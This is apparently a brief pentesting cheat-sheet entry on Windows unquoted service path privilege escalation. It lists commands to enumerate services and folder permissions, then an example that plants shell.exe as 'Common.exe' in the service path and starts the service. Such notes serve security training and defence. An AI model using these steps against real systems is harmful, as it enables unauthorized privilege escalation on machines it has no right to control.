17 lines
634 B
Markdown
17 lines
634 B
Markdown
# Unquoted Path
|
|
|
|
* Path to a service without quotes can be hijacked by inserting other executables and services into the path.
|
|
* Some part of path has to be writeable, windows tries to insert `.exe` instead of a space.
|
|
* Check services via `wmic service get name,displayname,pathname,startmode` and `sc qc <servicename>`
|
|
* Check permissions on paths via `.\accesschk64.exe /accepteula -uwdq "C:\Service Path\"`
|
|
|
|
## Example
|
|
* The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
|
|
```sh
|
|
copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
|
|
```
|
|
```sh
|
|
net start <service>
|
|
```
|
|
|